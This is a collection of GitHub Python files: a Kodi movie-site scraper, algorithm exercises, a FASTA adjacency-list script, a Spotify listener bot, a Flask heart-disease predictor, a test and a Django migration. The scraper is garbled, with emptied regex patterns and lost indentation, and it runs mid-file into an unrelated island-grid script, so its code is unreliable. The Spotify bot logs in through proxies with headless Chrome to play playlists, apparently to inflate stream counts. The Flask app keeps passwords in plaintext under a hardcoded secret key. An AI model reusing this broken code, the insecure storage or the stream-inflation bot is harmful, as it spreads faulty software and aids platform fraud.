{"seq_id":"7105720598","text":"# -*- coding: utf-8 -*-\n#------------------------------------------------------------\n# pelisalacarta - XBMC Plugin\n# Canal para peliculasaudiolatino\n# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/\n#------------------------------------------------------------\n\nimport re\nimport sys\nimport urlparse\n\nfrom core import config\nfrom core import logger\nfrom core import scrapertools\nfrom core import servertools\nfrom core.item import Item\n\n\nDEBUG = config.get_setting(\"debug\")\n \n\ndef mainlist(item):\n    logger.info(\"channels.peliculasaudiolatino mainlist\")\n\n    itemlist = []\n    itemlist.append( Item(channel=item.channel, title=\"Recién agregadas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/ultimas-agregadas.html\", viewmode=\"movie\"))\n    itemlist.append( Item(channel=item.channel, title=\"Recién actualizadas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/recien-actualizadas.html\", viewmode=\"movie\"))\n    itemlist.append( Item(channel=item.channel, title=\"Las más vistas\", action=\"peliculas\", url=\"http://peliculasaudiolatino.com/las-mas-vistas.html\", viewmode=\"movie\"))\n    \n    itemlist.append( Item(channel=item.channel, title=\"Listado por géneros\" , action=\"generos\", url=\"http://peliculasaudiolatino.com\"))\n    itemlist.append( Item(channel=item.channel, title=\"Listado por años\" , action=\"anyos\", url=\"http://peliculasaudiolatino.com\"))\n    \n    itemlist.append( Item(channel=item.channel, title=\"Buscar...\" , action=\"search\") )\n    return itemlist\n\ndef peliculas(item):\n    logger.info(\"channels.peliculasaudiolatino peliculas\")\n\n    itemlist = []\n\n    # Descarga la página\n    data = scrapertools.cachePage(item.url)\n\n    # Extrae las entradas de la pagina seleccionada\n    patron = '\"([^\"]+)\"'\n\n    next_page = scrapertools.find_single_match(data,'')\n    if next_page!=\"\":\n        itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=\">> Página siguiente\" , url=urlparse.urljoin(item.url,next_page).replace(\"/../../\",\"/\"), viewmode=\"movie\", folder=True) )\n\n    return itemlist\n\ndef generos(item):\n    logger.info(\"channels.peliculasaudiolatino generos\")\n    itemlist = []\n\n    # Descarga la página\n    data = scrapertools.cachePage(item.url)\n\n    # Limita el bloque donde buscar\n    data = scrapertools.find_single_match(data,'')\n\n    # Extrae las entradas\n    patron = '([^<]+)<'\n    matches = re.compile(patron,re.DOTALL).findall(data)\n    if (DEBUG): scrapertools.printMatches(matches)\n    \n    for match in matches:\n        scrapedurl = urlparse.urljoin(item.url,match[0])\n        scrapedtitle = match[1].strip()\n        
scrapedthumbnail = \"\"\n scrapedplot = \"\"\n logger.info(scrapedtitle)\n\n itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=scrapedtitle , url=scrapedurl , thumbnail=scrapedthumbnail , plot=scrapedplot , folder=True, viewmode=\"movie\") )\n\n itemlist = sorted(itemlist, key=lambda Item: Item.title) \n return itemlist\n \ndef anyos(item):\n logger.info(\"channels.peliculasaudiolatino anyos\")\n itemlist = []\n\n # Descarga la página\n data = scrapertools.cachePage(item.url)\n\n # Limita el bloque donde buscar\n data = scrapertools.find_single_match(data,'
')\n logger.info(\"channels.peliculasaudiolatino data=\"+data)\n\n # Extrae las entradas\n patron = '([^<]+)<'\n matches = re.compile(patron,re.DOTALL).findall(data)\n if (DEBUG): scrapertools.printMatches(matches)\n \n for scrapedurl,scrapedtitle in matches:\n url = urlparse.urljoin(item.url,scrapedurl)\n title = scrapedtitle\n thumbnail = \"\"\n plot = \"\"\n if (DEBUG): logger.info(\"title=[\"+title+\"], url=[\"+url+\"], thumbnail=[\"+thumbnail+\"]\")\n\n itemlist.append( Item(channel=item.channel, action=\"peliculas\", title=title , url=url , thumbnail=thumbnail , plot=plot, folder=True, viewmode=\"movie\") )\n\n return itemlist\n\ndef search(item,texto):\n logger.info(\"channels.peliculasaudiolatino search\")\n itemlist = []\n\n texto = texto.replace(\" \",\"+\")\n try:\n # Series\n item.url=\"http://peliculasaudiolatino.com/busqueda.php?q=%s\"\n item.url = item.url % texto\n item.extra = \"\"\n itemlist.extend(peliculas(item))\n itemlist = sorted(itemlist, key=lambda Item: Item.title) \n \n return itemlist\n \n # Se captura la excepción, para no interrumpir al buscador global si un canal falla\n except:\n import sys\n for line in sys.exc_info():\n logger.error( \"%s\" % line )\n return []\n\ndef findvideos(item):\n logger.info(\"channels.peliculasaudiolatino videos\")\n # Descarga la página\n\n data = scrapertools.cachePage(item.url)\n data = scrapertools.find_single_match(data,'
(.*?)')
if y >= 0 and y < R and x >= 0 and x < C:\n        if island[y][x] != '0':\n            cnt += 1\n        elif island[y][x] == '0':\n            break\n    else:\n        break\ndef remove_island(spell,island):\n    for lend in range(len(island)):\n        island[lend] = island[lend].replace(spell,'0')\n\nx, y = 0, 0\nisland = ['HFDFFB', 'AJHGDH', 'DGAGEH']\nfor i in range(len(island)):\n    print(island[i])\nremove_island(island[y][x],island)\nfor k in range(4):\n    check(x, y, k)\nfor i in range(len(island)):\n    print(island[i])","repo_name":"01090841589/solved_problem","sub_path":"solving/D4_수지의 수지 맞는 여행.py","file_name":"D4_수지의 수지 맞는 여행.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"84"}
{"seq_id":"641230959","text":"'''\r\nCreated on 09 gen 2019\r\n\r\n@author: Lorenzo Guenci (Student ID 1532651)\r\n'''\r\nfrom Bio import SeqIO\r\n\r\ndef vertex ():\r\n    path_to_file = ''\r\n    vertexes=[]\r\n    with open(path_to_file, mode='r') as handle:\r\n        for record in SeqIO.parse(handle, 'fasta'):\r\n            description = record.description\r\n            sequence = record.seq\r\n            vertexes+=[[description, str(sequence)]]\r\n    return vertexes\r\n\r\ndef adjacency_List(vertexes):\r\n    vertexes_clone=vertexes[::]\r\n    adjacency_list=[]\r\n    for vertex in vertexes:\r\n        suffix=vertex[1][-3:]\r\n        for vertex_clone in vertexes_clone:\r\n            if vertexes.index(vertex)==vertexes_clone.index(vertex_clone):\r\n                continue\r\n            prefix=vertex_clone[1][:3]\r\n            if suffix==prefix:\r\n                adjacency_list+=[[vertex[0], vertex_clone[0]]]\r\n    return adjacency_list\r\nif __name__ == '__main__':\r\n    for a in adjacency_List(vertex()):\r\n        print(a[0]+\" \" + a[1])","repo_name":"Gohos322/HW4","sub_path":"Required by other Challenges/grph.py","file_name":"grph.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"31356146002","text":"\nfrom gc import collect\nfrom random import randint\nfrom shutil import rmtree\nfrom multiprocessing import Array, Lock, Process, Event\nfrom threading import Thread, current_thread\nfrom traceback import format_exc\nfrom src.services.config import Config\nfrom src.application.spotify import Spotify\nfrom xvfbwrapper import Xvfb\nfrom boto3 import client\nfrom src.services.drivers import DriverManager\nfrom src.services.console import Console\nfrom time import sleep\nfrom json import loads\nfrom src.services.proxies import ProxyManager, PROXY_FILE_LISTENER\nfrom src.services.x11vncwrapper import X11vnc\n\nclass ListenerContext:\n    def __init__(self, console: Console, batchId: int, user: dict, playlist: str, shutdownEvent: Event, proxy: dict = None, vnc: bool = False, headless = True):\n        self.console = console\n        self.batchId = batchId\n        self.user = user\n        self.playlist = playlist\n        self.proxy = proxy\n        self.vnc = vnc\n        self.headless = headless\n        self.shutdownEvent = shutdownEvent \n    \nclass Listener(Process):\n    def __init__(self, pcontext: ListenerContext):\n        Process.__init__(self)\n        self.p_context = pcontext\n        self.driverManager = DriverManager(pcontext.console, pcontext.shutdownEvent, startService=False)\n        self.client = client('sqs')\n        self.totalMessageReceived = 0\n        self.proxyManager = ProxyManager(proxyFile=PROXY_FILE_LISTENER)\n        self.lockClient = Lock()\n        self.lockDriver = Lock()\n\n    def run(self):\n        tid = current_thread().native_id\n        self.p_context.console.log('#%d Start' % tid)\n        driver = None\n        try:\n            if 
self.p_context.shutdownEvent.is_set():\n                return \n            vdisplay = None\n            x11vnc = None\n            if self.p_context.headless == False:\n                width = 1280\n                height = 1024\n                if 'windowSize' in self.p_context.user:\n                    [width,height] = self.p_context.user['windowSize'].split(',')\n                vdisplay = Xvfb(width=width, height=height, colordepth=24, tempdir=None, noreset='+render')\n                vdisplay.start()\n                if self.p_context.vnc:\n                    x11vnc = X11vnc(vdisplay)\n                    x11vnc.start()\n\n            with self.lockDriver:\n                driverData = self.driverManager.getDriver(\n                    type='chrome',\n                    uid=tid,\n                    user=self.p_context.user,\n                    proxy=self.p_context.proxy,\n                    headless= self.p_context.headless\n                )\n                if not driverData:\n                    return\n                driver = driverData['driver']\n                userDataDir = driverData['userDataDir']\n                if not driver:\n                    return\n            \n        except:\n            self.p_context.console.error('Unavailable webdriver: %s' % format_exc())\n        else:\n            try:\n                spotify = Spotify.Adapter(driver, self.p_context.console, self.p_context.shutdownEvent)\n                if spotify.login(self.p_context.user['email'], self.p_context.user['password']):\n                    self.p_context.console.log('#%d Logged In' % tid)\n                    if not self.p_context.shutdownEvent.is_set():\n                        self.p_context.console.log('#%d Start listening...' % tid)\n                        spotify.playPlaylist(self.p_context.playlist, self.p_context.shutdownEvent, 90, 110)\n                        self.p_context.console.log('#%d Played' % tid)\n                        with self.lockClient:\n                            self.client.delete_message(\n                                QueueUrl=self.p_context.config.SQS_ENDPOINT,\n                                ReceiptHandle=self.p_context.receiptHandle\n                            )\n                            self.p_context.console.log('#%d Message deleted' % tid)\n            except:\n                self.p_context.console.exception()\n                spotify.saveScreenshot()\n            \n        if driver:\n            try:\n                driver.quit()\n                del driver\n            except:\n                pass\n            if userDataDir:\n                try:\n                    rmtree(path=userDataDir, ignore_errors=True)\n                except:\n                    pass\n            if x11vnc: #Terminate vnc server if any\n                try:\n                    x11vnc.stop()\n                    del x11vnc\n                except:\n                    pass\n            if vdisplay:\n                try:\n                    vdisplay.stop()\n                    del vdisplay\n                except:\n                    pass\n        collect()","repo_name":"adelamarre/zeus","sub_path":"src/application/spotify/listener.py","file_name":"listener.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"72935632913","text":"class Solution:\n    def restoreArray(self, adjacentPairs: List[List[int]]) -> List[int]:\n        edges = {}\n        heads = set()\n        for n1, n2 in adjacentPairs:\n            if n1 not in edges:\n                edges[n1] = set()\n            if n2 not in edges:\n                edges[n2] = set()\n            if n1 not in heads:\n                heads.add(n1)\n            else:\n                heads.remove(n1)\n            if n2 not in heads:\n                heads.add(n2)\n            else:\n                heads.remove(n2) \n            edges[n1].add(n2)\n            edges[n2].add(n1)\n        # print(list(heads))\n        \n        visited = set()\n        ans = []\n        node = list(heads)[0]\n        visited.add(node)\n        for i in range(len(adjacentPairs)+1):\n            ans.append(node)\n            for next_node in edges[node]:\n                if next_node not in visited:\n                    node = next_node\n                    visited.add(next_node)\n        return ans\n        ","repo_name":"GreatStephen/MyLeetcodeSolutions","sub_path":"1contest226/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":997,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"}
{"seq_id":"28529593372","text":"'''n = s = 0\r\nwhile n != 999: #utilização de flags\r\n    n = int(input('Digite um número:'))\r\n    s += n\r\ns -= 999\r\nprint(f'A soma vale {s}')'''\r\n\r\n\r\nn = s = 0\r\nwhile True:\r\n    n = int(input('Digite um número:'))\r\n    if n == 999:\r\n        break # se nao for igual 999 ele soma ,se for 999 sai de um enquanto e quebra(finalizando)\r\n    s += n\r\nprint(f'A soma vale 
{s}')","repo_name":"https-luana/Aulas-de-Python-","sub_path":"CursoEmvideo/aula015.py","file_name":"aula015.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"pt","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"23768435941","text":"from flask import Flask, render_template, request, g, flash, redirect, url_for, session\r\nimport numpy as np\r\nfrom tensorflow.keras.models import load_model\r\nfrom sklearn.impute import KNNImputer\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nimport sqlite3\r\n\r\napp = Flask(__name__, template_folder=\"C://Users//SJ//Desktop//ML Project//heart prediction//templates\",\r\n static_folder=\"C://Users//SJ//Desktop//ML Project//heart prediction//static\")\r\napp.secret_key = 'MLproject'\r\n\r\n\r\n# Establish a new connection for each thread\r\ndef get_db():\r\n db = getattr(g, '_database', None)\r\n if db is None:\r\n db = g._database = sqlite3.connect('HeartPrediction_History.db')\r\n return db\r\n\r\n@app.teardown_appcontext\r\ndef close_connection(exception):\r\n db = getattr(g, '_database', None)\r\n if db is not None:\r\n db.close()\r\n\r\n\r\n# Load the saved model\r\nmodel = load_model('heart_disease_model.h5')\r\n\r\n# Define the column names and ranges for validation\r\ncategorical_columns = [\"Smoking\", \"AlcoholDrinking\", \"Stroke\", \"DiffWalking\", \"Sex\", \"AgeCategory\", \"Race\", \"Diabetic\", \"PhysicalActivity\", \"GenHealth\", \"Asthma\", \"KidneyDisease\", \"SkinCancer\"]\r\nnumerical_columns = [\"PhysicalHealth\", \"SleepTime\", \"MentalHealth\", \"BMI\"]\r\ncolumn_ranges = {\r\n \"BMI\": (0, 100),\r\n \"SleepTime\": (0, 24),\r\n \"PhysicalHealth\": (0, 30),\r\n \"MentalHealth\": (0, 30)\r\n}\r\n\r\n@app.before_request\r\ndef check_session():\r\n if request.endpoint in ['startup', 'history','heart'] and 'id' not in session:\r\n return redirect(url_for('index'))\r\n\r\n@app.route(\"/startup\")\r\ndef startup():\r\n if 'id' in session:\r\n # Retrieve the user ID from the session\r\n user_id = session.get('id')\r\n if user_id:\r\n # Retrieve the user data from the database using the user_id\r\n user_data = query_user_data_from_database(user_id)\r\n return render_template(\"startup.html\", user_data=user_data)\r\n else:\r\n return redirect(url_for('index'))\r\n # User is not logged in, redirect to login page\r\n return redirect(url_for('index'))\r\n\r\n@app.route(\"/register\", methods=[\"POST\", \"GET\"])\r\ndef register():\r\n if request.method == 'POST':\r\n email = request.form['email']\r\n username = request.form['username']\r\n password = request.form['password']\r\n\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Create the \"users\" table if it doesn't exist\r\n conn.execute('''\r\n CREATE TABLE IF NOT EXISTS users (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n email TEXT NOT NULL,\r\n username TEXT NOT NULL,\r\n password TEXT NOT NULL\r\n )\r\n ''')\r\n\r\n # Create the \"prediction_history\" table if it doesn't exist\r\n conn.execute('''\r\n CREATE TABLE IF NOT EXISTS prediction_history (\r\n id INTEGER PRIMARY KEY AUTOINCREMENT,\r\n user_id INTEGER NOT NULL,\r\n prediction_time TIMESTAMP DEFAULT CURRENT_TIMESTAMP,\r\n Smoking TEXT,\r\n AlcoholDrinking TEXT,\r\n Stroke TEXT,\r\n DiffWalking TEXT,\r\n Sex TEXT,\r\n AgeCategory TEXT,\r\n Race TEXT,\r\n Diabetic TEXT,\r\n PhysicalActivity TEXT,\r\n GenHealth TEXT,\r\n Asthma TEXT,\r\n KidneyDisease TEXT,\r\n SkinCancer TEXT,\r\n PhysicalHealth NUMERIC,\r\n SleepTime NUMERIC,\r\n MentalHealth 
NUMERIC,\r\n BMI NUMERIC,\r\n predicted_result NUMERIC,\r\n FOREIGN KEY (user_id) REFERENCES users (id)\r\n )\r\n ''')\r\n\r\n # Check if the email already exists in the database\r\n cursor = conn.cursor()\r\n cursor.execute('SELECT * FROM users WHERE email=?', (email,))\r\n existing_user = cursor.fetchone()\r\n cursor.close()\r\n\r\n if existing_user:\r\n # Email already exists in the database\r\n flash('Registration failed. Email already in use.', 'error')\r\n conn.close() \r\n return redirect(url_for('register'))\r\n\r\n # Insert user data into the database\r\n conn.execute('INSERT INTO users (email, username, password) VALUES (?, ?, ?)', (email, username, password))\r\n conn.commit()\r\n\r\n # Close the connection\r\n conn.close()\r\n\r\n flash('User registered successfully', 'success')\r\n return redirect(url_for('index'))\r\n \r\n return render_template(\"registration.html\")\r\n\r\ndef query_user_data_from_database(user_id):\r\n # Connect to the database\r\n conn = get_db()\r\n\r\n # Perform a query to retrieve the user data based on the user_id\r\n cursor = conn.execute('SELECT * FROM users WHERE id = ?', (user_id,))\r\n user_data = cursor.fetchone()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n return user_data\r\n\r\ndef get_results():\r\n # Connect to the database\r\n conn = get_db()\r\n\r\n # Get the current session ID\r\n session_id = session['id']\r\n\r\n # Create a cursor\r\n cursor = conn.cursor()\r\n\r\n # Execute a SELECT query to retrieve the rows\r\n cursor.execute('SELECT prediction_time, predicted_result FROM prediction_history WHERE user_id=?', (session_id,))\r\n\r\n # Fetch the results\r\n results = cursor.fetchall()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n # Convert the results to a list\r\n results_list = list(results)\r\n\r\n # Return the results\r\n return results_list\r\n\r\n\r\n\r\n@app.route(\"/logout\", methods=[\"GET\", \"POST\"])\r\ndef logout():\r\n # Clear the user ID from the session\r\n session.pop('id', None)\r\n # Logout successful\r\n flash('Logout successful!', 'success')\r\n return redirect(url_for('index'))\r\n \r\n\r\n@app.route(\"/login\", methods=[\"GET\", \"POST\"])\r\ndef login():\r\n if request.method == \"POST\":\r\n email = request.form['email']\r\n password = request.form['password']\r\n\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Perform database operations using the connection\r\n cursor = conn.cursor()\r\n\r\n # Execute a SELECT query to retrieve the user with the given username and password\r\n cursor.execute('SELECT * FROM users WHERE email=? 
AND password=?', (email, password))\r\n\r\n # Fetch the first row from the result set\r\n user = cursor.fetchone()\r\n\r\n # Close the cursor and connection\r\n cursor.close()\r\n conn.close()\r\n\r\n if user:\r\n # Store the user ID in the session\r\n session['id'] = user[0]\r\n session['name'] = user[2] \r\n # User credentials are valid\r\n return redirect(url_for('startup'))\r\n else:\r\n # User credentials are invalid\r\n flash('Invalid username or password', 'error')\r\n return redirect(url_for('index'))\r\n\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/\", methods=[\"GET\", \"POST\"])\r\ndef index():\r\n return render_template(\"login.html\")\r\n\r\n@app.route(\"/heart\")\r\ndef heart():\r\n return render_template(\"heart.html\")\r\n\r\n@app.route(\"/history\")\r\ndef history():\r\n results = get_results()\r\n name = session.get('name') # Get the name from the session\r\n return render_template(\"history.html\", results=results, name=name)\r\n\r\n\r\n\r\n\r\n# Define encoding mappings\r\nsmoking_mapping = {\"No\": 0, \"Yes\": 1}\r\nalcohol_mapping = {\"No\": 0, \"Yes\": 1}\r\nstroke_mapping = {\"No\": 0, \"Yes\": 1}\r\ndiff_walking_mapping = {\"No\": 0, \"Yes\": 1}\r\nsex_mapping = {\"Female\": 0, \"Male\": 1}\r\nage_cat_mapping = {\"55-59\": 0, \"80 or older\": 1, '65-69': 2, '75-79': 3, '40-44': 4, '70-74': 5, '60-64': 6, '50-54': 7, '45-49': 8, '18-24': 9, '35-39': 10, '30-34': 11, '25-29': 12}\r\nrace_mapping = {\"White\": 0, \"Black\": 1, \"Asian\": 2, \"American Indian/Alaskan Native\": 3, \"Other\": 4, \"Hispanic\": 5}\r\ndiabetic_mapping = {\"Yes\": 0, \"No\": 1, \"No, borderline diabetes\": 2, \"Yes (during pregnancy)\": 3}\r\nphysical_activity_mapping = {\"No\": 0, \"Yes\": 1}\r\ngen_health_mapping = {\"Very good\": 0, 'Fair': 1, 'Good': 2, 'Poor':3, 'Excellent':4}\r\nasthma_mapping = {\"No\": 0, \"Yes\": 1}\r\nkidney_disease_mapping = {\"No\": 0, \"Yes\": 1}\r\nskin_cancer_mapping = {\"No\":0, \"Yes\":1}\r\n\r\nreverse_smoking_mapping = {v: k for k, v in smoking_mapping.items()}\r\nreverse_alcohol_mapping = {v: k for k, v in alcohol_mapping.items()}\r\nreverse_stroke_mapping = {v: k for k, v in stroke_mapping.items()}\r\nreverse_diff_walking_mapping = {v: k for k, v in diff_walking_mapping.items()}\r\nreverse_sex_mapping = {v: k for k, v in sex_mapping.items()}\r\nreverse_age_cat_mapping = {v: k for k, v in age_cat_mapping.items()}\r\nreverse_race_mapping = {v: k for k, v in race_mapping.items()}\r\nreverse_diabetic_mapping = {v: k for k, v in diabetic_mapping.items()}\r\nreverse_physical_activity_mapping = {v: k for k, v in physical_activity_mapping.items()}\r\nreverse_gen_health_mapping = {v: k for k, v in gen_health_mapping.items()}\r\nreverse_asthma_mapping = {v: k for k, v in asthma_mapping.items()}\r\nreverse_kidney_disease_mapping = {v: k for k, v in kidney_disease_mapping.items()}\r\nreverse_skin_cancer_mapping = {v: k for k, v in skin_cancer_mapping.items()}\r\n\r\n@app.route(\"/predict\", methods=[\"POST\"])\r\ndef predict():\r\n \r\n # Load the scaler\r\n #scaler = joblib.load(scaler_path)\r\n \r\n # Get the form data\r\n form_data = request.form.to_dict()\r\n\r\n name = form_data[\"name\"]\r\n\r\n # Define the numerical columns used for normalization\r\n #numerical_columns = [\"PhysicalHealth\", \"SleepTime\", \"MentalHealth\", \"BMI\"]\r\n\r\n #Normalize the numerical values in form_data\r\n #normalized_data = form_data.copy() # Create a copy of the form data\r\n\r\n #input_values = []\r\n #for col in numerical_columns:\r\n # 
input_values.append(float(form_data[col]))\r\n\r\n #normalized_values = scaler.transform([input_values])[0]\r\n\r\n #normalized_data['PhysicalHealth'] = normalized_values[0]\r\n #normalized_data['SleepTime'] = normalized_values[1]\r\n #normalized_data['MentalHealth'] = normalized_values[2]\r\n #normalized_data['BMI'] = normalized_values[3]\r\n\r\n # Convert the form data to a list of values in the same order as your dataset\r\n new_sample = [form_data[\"Smoking\"], form_data[\"AlcoholDrinking\"], form_data[\"Stroke\"], form_data[\"DiffWalking\"],\r\n form_data[\"Sex\"], form_data[\"AgeCategory\"], form_data[\"Race\"], form_data[\"Diabetic\"],\r\n form_data[\"PhysicalActivity\"], form_data[\"GenHealth\"], form_data[\"Asthma\"],\r\n form_data[\"KidneyDisease\"], form_data[\"SkinCancer\"], float(form_data[\"PhysicalHealth\"]),\r\n float(form_data[\"SleepTime\"]), float(form_data[\"MentalHealth\"]), float(form_data[\"BMI\"])]\r\n \r\n new_sample = [float(x) for x in new_sample]\r\n\r\n # Validate the input values\r\n for i, col in enumerate(numerical_columns):\r\n val = new_sample[i+len(categorical_columns)]\r\n if not column_ranges[col][0] <= val <= column_ranges[col][1]:\r\n return render_template(\"result.html\", error=f\"Invalid value {val} for column {col}\")\r\n\r\n # Convert the list to a numpy array\r\n new_sample = np.array([new_sample])\r\n\r\n # Impute the missing values using KNN\r\n imputer = KNNImputer(n_neighbors=3)\r\n new_sample[:, :13] = imputer.fit_transform(new_sample[:, :13])\r\n\r\n # Scale the numerical features to the range [0,1]\r\n scaler = MinMaxScaler()\r\n new_sample[:, 13:17] = scaler.fit_transform(new_sample[:, 13:17])\r\n\r\n # Concatenate the imputed and normalized columns 0 to 13 with the normalized columns 14 to 16\r\n new_sample = np.concatenate([new_sample[:, :13], new_sample[:, 13:17]], axis=1)\r\n\r\n # Make the prediction\r\n prediction = model.predict(new_sample)\r\n\r\n # Print the predicted probability of heart disease in percentage\r\n predicted_prob = round(prediction[0][0]*100, 2)\r\n #decoded data\r\n decoded_data = [\r\n reverse_smoking_mapping[int(new_sample[0][0])],\r\n reverse_alcohol_mapping[int(new_sample[0][1])],\r\n reverse_stroke_mapping[int(new_sample[0][2])],\r\n reverse_diff_walking_mapping[int(new_sample[0][3])],\r\n reverse_sex_mapping[int(new_sample[0][4])],\r\n reverse_age_cat_mapping[int(new_sample[0][5])],\r\n reverse_race_mapping[int(new_sample[0][6])],\r\n reverse_diabetic_mapping[int(new_sample[0][7])],\r\n reverse_physical_activity_mapping[int(new_sample[0][8])],\r\n reverse_gen_health_mapping[int(new_sample[0][9])],\r\n reverse_asthma_mapping[int(new_sample[0][10])],\r\n reverse_kidney_disease_mapping[int(new_sample[0][11])],\r\n reverse_skin_cancer_mapping[int(new_sample[0][12])],\r\n float(form_data[\"PhysicalHealth\"]),\r\n float(form_data[\"SleepTime\"]),\r\n float(form_data[\"MentalHealth\"]), \r\n float(form_data[\"BMI\"])\r\n ]\r\n\r\n # Store the user data in the database\r\n store_user_data_in_database(decoded_data, predicted_prob)\r\n\r\n return render_template(\"result.html\", name=name, predicted_prob=predicted_prob)\r\n\r\n\r\ndef store_user_data_in_database(user_data, predicted_prob):\r\n # Create a new connection for the current thread\r\n conn = get_db()\r\n\r\n # Retrieve the user ID from the session\r\n user_id = session.get('id')\r\n\r\n # Insert user data into the prediction_history table\r\n conn.execute('''\r\n INSERT INTO prediction_history (user_id, prediction_time, Smoking, AlcoholDrinking, Stroke, 
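[Editor's aside] Calling fit_transform on the single incoming sample, as the prediction code above does, makes MinMaxScaler map every feature to 0 (each column's min equals its max) and gives KNNImputer nothing to impute from. A hedged sketch of the usual pattern instead: fit once at training time, persist, and only transform at predict time (the file name and the 13:17 column slice are assumptions taken from the code above):

import joblib
from sklearn.preprocessing import MinMaxScaler

# Training time: fit on the full training matrix, then persist.
# scaler = MinMaxScaler().fit(X_train[:, 13:17])
# joblib.dump(scaler, 'scaler.joblib')

# Prediction time: transform only, never refit on one row.
scaler = joblib.load('scaler.joblib')
new_sample[:, 13:17] = scaler.transform(new_sample[:, 13:17])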
DiffWalking, Sex, AgeCategory,\r\n Race, Diabetic, PhysicalActivity, GenHealth, Asthma, KidneyDisease, SkinCancer, PhysicalHealth, SleepTime,\r\n MentalHealth, BMI, predicted_result)\r\n VALUES (?, CURRENT_TIMESTAMP, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)\r\n ''', (user_id, user_data[0], user_data[1], user_data[2], user_data[3], user_data[4], user_data[5], user_data[6],\r\n user_data[7], user_data[8], user_data[9], user_data[10], user_data[11], user_data[12], user_data[13],\r\n user_data[14], user_data[15], user_data[16], predicted_prob))\r\n\r\n # Commit the changes\r\n conn.commit()\r\n\r\n # Close the connection\r\n conn.close()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n app.run(debug=True)","repo_name":"SJWONG27/HealthOracle","sub_path":"ML Project/Predict.py","file_name":"Predict.py","file_ext":"py","file_size_in_byte":14273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"84"} +{"seq_id":"23165364839","text":"import unittest\nfrom vixtk import test, gui, core\nfrom vix.widgets import CommandBar\nfrom vix import flags\n\nclass CommandBarTest(unittest.TestCase):\n def setUp(self):\n self.screen = test.VTextScreen((100,40))\n self.app = gui.VApplication([], screen=self.screen)\n\n def tearDown(self):\n del self.screen\n self.app.exit()\n core.VCoreApplication.vApp=None\n del self.app\n\n def testBasicCommandBar(self):\n bar = CommandBar(parent=None)\n bar.setGeometry((0,0,100,1))\n bar.show()\n bar.setMode(flags.INSERT_MODE)\n self.app.processEvents()\n self.assertEqual(self.screen.stringAt(0,0,12), \"-- INSERT --\")\n bar.setMode(flags.COMMAND_MODE)\n self.app.processEvents()\n self.assertEqual(self.screen.stringAt(0,0,12), \" \")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"maiconpl/vix","sub_path":"tests/vix/widgets/test_CommandBar.py","file_name":"test_CommandBar.py","file_ext":"py","file_size_in_byte":881,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"84"} +{"seq_id":"37905362490","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('backend', '0003_remove_event_creator_id'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Partier',\n fields=[\n\n ('id', models.AutoField(serialize=False, primary_key=True, auto_created=True, verbose_name='ID')),\n ('profile_image', models.FileField(upload_to='')),\n ('litness', models.DecimalField(decimal_places=5, max_digits=13, null=True)),\n ('events_invited', models.ManyToManyField(to='backend.Event', related_name='events')),\n ('user', models.OneToOneField(to=settings.AUTH_USER_MODEL)),\n ],\n ),\n ]\n","repo_name":"whatslit/backend","sub_path":"backend/migrations/0004_partier.py","file_name":"0004_partier.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"84"} +{"seq_id":"40443135472","text":"__author__ = 'huafeng'\n#encoding:utf-8\n\nimport os\nimport re\nimport time\nimport gevent\nimport codecs\nimport random\nimport urllib2\nimport simplejson\nimport gevent.monkey\nfrom bs4 import BeautifulSoup\nfrom math import ceil\ngevent.monkey.patch_all()\n\nPATH = os.path.dirname(__file__)\n\nclass BaiKe(object):\n def __init__(self):\n\n self.timeout_url_list = []\n\n def write_timeout_url(self, url_list):\n 
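[Editor's aside] The 0004_partier migration above was written for Django 1.x, where OneToOneField still defaulted on_delete to CASCADE. A hedged sketch of the same field as Django 2.0+ requires it (model and field names taken from the migration):

from django.conf import settings
from django.db import models

class Partier(models.Model):
    # on_delete has been a required argument since Django 2.0.
    user = models.OneToOneField(settings.AUTH_USER_MODEL,
                                on_delete=models.CASCADE)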
